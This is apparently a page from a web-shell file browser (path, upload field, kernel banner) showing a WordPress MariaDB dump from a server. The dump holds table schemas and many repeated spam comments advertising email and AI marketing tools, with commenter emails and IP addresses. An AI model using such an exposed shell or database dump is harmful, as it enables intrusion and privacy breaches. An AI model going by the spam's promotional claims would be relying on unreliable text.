Current Path : /storage/v11800/wthtest1/

Linux v11800 5.3.0-1023-aws #25~18.04.1-Ubuntu SMP Fri Jun 5 15:19:18 UTC 2020 aarch64

Upload File :
Current File : /storage/v11800/wthtest1/.db.sql
-- MariaDB dump 10.19  Distrib 10.6.9-MariaDB, for debian-linux-gnu (aarch64)
--
-- Host: localhost    Database: wthtest1db
-- ------------------------------------------------------
-- Server version	10.6.9-MariaDB-1:10.6.9+maria~ubu2004

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wp_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wp_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `schedule` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `priority` tinyint(3) unsigned NOT NULL DEFAULT 10,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id` (`claim_id`),
  KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=292 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_actions`
--

LOCK TABLES `wp_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_claims`
--

DROP TABLE IF EXISTS `wp_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=3060 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_claims`
--

LOCK TABLES `wp_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_groups`
--

DROP TABLE IF EXISTS `wp_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_groups`
--

LOCK TABLES `wp_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_groups` VALUES (1,'action-scheduler-migration'),(2,'wp_mail_smtp');
/*!40000 ALTER TABLE `wp_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_logs`
--

DROP TABLE IF EXISTS `wp_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action_id` bigint(20) unsigned NOT NULL,
  `message` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `log_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_logs`
--

LOCK TABLES `wp_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_as3cf_items`
--

DROP TABLE IF EXISTS `wp_as3cf_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_as3cf_items` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `provider` varchar(18) COLLATE utf8mb4_unicode_ci NOT NULL,
  `region` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `bucket` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `path` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL,
  `original_path` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL,
  `is_private` tinyint(1) NOT NULL DEFAULT 0,
  `source_type` varchar(18) COLLATE utf8mb4_unicode_ci NOT NULL,
  `source_id` bigint(20) NOT NULL,
  `source_path` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL,
  `original_source_path` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL,
  `extra_info` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `uidx_source` (`source_type`,`source_id`),
  UNIQUE KEY `uidx_path` (`path`(190),`id`),
  UNIQUE KEY `uidx_original_path` (`original_path`(190),`id`),
  UNIQUE KEY `uidx_source_path` (`source_path`(190),`id`),
  UNIQUE KEY `uidx_original_source_path` (`original_source_path`(190),`id`),
  UNIQUE KEY `uidx_provider_bucket` (`provider`,`bucket`(190),`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_as3cf_items`
--

LOCK TABLES `wp_as3cf_items` WRITE;
/*!40000 ALTER TABLE `wp_as3cf_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_as3cf_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=172 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=86 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` VALUES (58,1,'AI Tools List','Whitmoyer@yahoo.com','https://lnkd.in/gfHBmhE5','185.107.57.19','2023-12-13 17:27:46','2023-12-13 17:27:46','The question is interesting, I will also take part in the discussion. Together we can come to the right answer.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','comment',0,0),(59,1,'Extended Opportunity','76562@gmail.com','','109.72.127.188','2024-02-14 20:33:11','2024-02-14 20:33:11','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(60,1,'Extended Opportunity','32039@gmail.com','','109.72.127.188','2024-02-14 20:33:28','2024-02-14 20:33:28','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(61,1,'Extended Opportunity','86793@gmail.com','','109.72.127.188','2024-02-14 20:34:01','2024-02-14 20:34:01','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(62,1,'Extended Opportunity','79521@gmail.com','','109.72.127.188','2024-02-14 20:34:49','2024-02-14 20:34:49','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(63,1,'Extended Opportunity','54189@gmail.com','','109.72.127.188','2024-02-14 20:35:21','2024-02-14 20:35:21','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(64,1,'Extended Opportunity','73612@gmail.com','','109.72.127.188','2024-02-14 20:35:59','2024-02-14 20:35:59','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(65,1,'Extended Opportunity','79803@gmail.com','','109.72.127.188','2024-02-14 20:36:48','2024-02-14 20:36:48','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(66,1,'Extended Opportunity','92409@gmail.com','','109.72.127.188','2024-02-14 20:37:03','2024-02-14 20:37:03','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(67,1,'Extended Opportunity','9308@gmail.com','','109.72.127.188','2024-02-14 20:37:38','2024-02-14 20:37:38','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(68,1,'Extended Opportunity','47557@gmail.com','','109.72.127.188','2024-02-14 20:38:23','2024-02-14 20:38:23','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(69,1,'Extended Opportunity','22552@gmail.com','','109.72.127.188','2024-02-14 20:39:02','2024-02-14 20:39:02','Hey Guys,\r\n\r\nWarning: From February 2024, all existing email autoresponders will become obsolete!\r\n\r\nIn fact, if you want to send marketing emails, promotional emails, or any other sort of emails starting in February 2024, you’ll need to comply with Gmail’s and Yahoo’s draconic new directives.\r\n \r\nThey require regular marketers like you and I to setup complex code on sending domains… and existing autoresponders like Aweber and GetResponse are not helping: they’re requesting you do all the work, and their training is filled with complex instructions and flowcharts… \r\n \r\nHow would you like to send unlimited emails at the push of a button all with done-for-you DMARC, DKIM, SPF, custom IPs and dedicated SMTP sending servers?\r\n\r\nWhat I mean by all of that tech talk above, is that with ProfitMarc, we give you pre-set, pre-configured, DONE-FOR-YOU email sending addresses you can just load up and mail straight away.\r\n\r\nWe don’t even have any “setup tutorials” like other autoresponders either, because guess what: we already did all the setup for you!\r\n\r\nAll of our built-in sending addresses and servers are already pre-warmed with Gmail and Yahoo and they’re loving us: 99% inbox rate is the average!\r\n \r\n⇒ Grab your copy here! ⇒ https://ext-opp.com/ProfitMarc',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(70,1,'Extended Opportunity','27081@gmail.com','','185.125.50.101','2024-02-27 05:14:24','2024-02-27 05:14:24','Hey,\r\n\r\nThe moment we\'ve all been waiting for is finally here – GoBuildr is now LIVE! ?\r\n\r\n? Create ultra-lightning-fast websites, sales funnels, eCommerce stores, and more in less than 60 seconds, with just a keyword!\r\n\r\n? Say goodbye to the limitations of traditional page builders. GoBuildr combines the functionality of 16 different tools into one powerful app, supercharged with AI-assisted technology.\r\n\r\n⇒ Click Here To Checkout Demo https://ext-opp.com/GoBuildr',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(71,1,'Extended Opportunity','57844@gmail.com','','185.125.50.101','2024-02-27 05:14:39','2024-02-27 05:14:39','Hey,\r\n\r\nThe moment we\'ve all been waiting for is finally here – GoBuildr is now LIVE! ?\r\n\r\n? Create ultra-lightning-fast websites, sales funnels, eCommerce stores, and more in less than 60 seconds, with just a keyword!\r\n\r\n? Say goodbye to the limitations of traditional page builders. GoBuildr combines the functionality of 16 different tools into one powerful app, supercharged with AI-assisted technology.\r\n\r\n⇒ Click Here To Checkout Demo https://ext-opp.com/GoBuildr',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(72,1,'Extended Opportunity','36997@gmail.com','','185.125.50.101','2024-02-27 05:14:55','2024-02-27 05:14:55','Hey,\r\n\r\nThe moment we\'ve all been waiting for is finally here – GoBuildr is now LIVE! ?\r\n\r\n? Create ultra-lightning-fast websites, sales funnels, eCommerce stores, and more in less than 60 seconds, with just a keyword!\r\n\r\n? Say goodbye to the limitations of traditional page builders. GoBuildr combines the functionality of 16 different tools into one powerful app, supercharged with AI-assisted technology.\r\n\r\n⇒ Click Here To Checkout Demo https://ext-opp.com/GoBuildr',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(73,1,'Extended Opportunity','39756@gmail.com','','185.125.50.101','2024-02-27 05:15:24','2024-02-27 05:15:24','Hey,\r\n\r\nThe moment we\'ve all been waiting for is finally here – GoBuildr is now LIVE! ?\r\n\r\n? Create ultra-lightning-fast websites, sales funnels, eCommerce stores, and more in less than 60 seconds, with just a keyword!\r\n\r\n? Say goodbye to the limitations of traditional page builders. GoBuildr combines the functionality of 16 different tools into one powerful app, supercharged with AI-assisted technology.\r\n\r\n⇒ Click Here To Checkout Demo https://ext-opp.com/GoBuildr',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(74,1,'Extended Opportunity','64913@gmail.com','','185.125.50.101','2024-02-29 17:34:20','2024-02-29 17:34:20','He Got 256,354 Free Views With AI…\r\n\r\nCan you believe it? \r\n\r\nPeople spend thousands of dollars to get that kind of result… \r\n\r\nMy friend Kundan just did it for free… \r\n\r\nHe only used his new app… AI ScreenSnap… \r\n\r\nIt’s the world’s first AI app that can generate videos with the power of Video-Exclusive AI Engine… \r\n\r\nThat can edit, record, and generate videos with just a few clicks… with zero experience…\r\n\r\nClick here now and watch AI ScreenSnap in action https://ext-opp.com/AIScreenSnap',0,'0','Mozilla/5.0 (Windows NT 